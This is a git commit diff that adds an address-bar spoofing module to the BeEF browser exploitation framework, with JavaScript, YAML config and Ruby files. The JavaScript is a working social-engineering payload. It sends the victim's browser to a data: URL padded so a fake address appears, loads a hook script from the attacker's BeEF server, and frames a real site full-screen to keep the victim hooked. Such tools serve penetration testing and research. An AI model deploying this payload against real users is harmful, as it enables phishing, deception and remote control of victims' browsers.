Add 'Spoof Address Bar (data URL)' module

2017-01-16 11:07:00 +00:00
parent 91cc7ed873
commit e5f6ff3b11
3 changed files with 53 additions and 0 deletions
--- a/modules/social_engineering/spoof_addressbar_data/command.js
+++ b/modules/social_engineering/spoof_addressbar_data/command.js
@@ -0,0 +1,19 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
+
+  try {
+    window.location = "data:text/html,<%= @spoofed_url %><%= ' '*1337 %>?<script src='"+hook+"'></script><script>document.title='<%= @spoofed_url %>';beef.dom.createIframe('fullscreen',{'src':'<%= @real_url %>'},{},null);</script>"
+    beef.debug("[Spoof Address Bar (data)] Redirecting to data URL...");
+  } catch (e) {
+    beef.debug("[Spoof Address Bar (data)] could not redirect: "+e.message)
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=something went horribly wrong: " + e.message, beef.are.status_error());
+  }
+
+});
--- a/modules/social_engineering/spoof_addressbar_data/config.yaml
+++ b/modules/social_engineering/spoof_addressbar_data/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        spoof_addressbar_data:
+            enable: true
+            category: "Social Engineering"
+            name: "Spoof Address Bar (data URL)"
+            description: "This module redirects the browser to a legitimate looking URL with a ''data'' scheme, such as ''data:text/html,http://victim.com'', with a BeEF hook and a user-specified URL in a 100% x 100% iframe."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["O", "FF", "C"]
+                not_working: ["IE"]
--- a/modules/social_engineering/spoof_addressbar_data/module.rb
+++ b/modules/social_engineering/spoof_addressbar_data/module.rb
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Spoof_addressbar_data < BeEF::Core::Command
+
+  def self.options
+    [
+      {'name' => 'spoofed_url', 'ui_label' => 'Spoofed URL', 'type' => 'text', 'value' => 'https://example.com/'},
+      {'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'https://example.com/'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end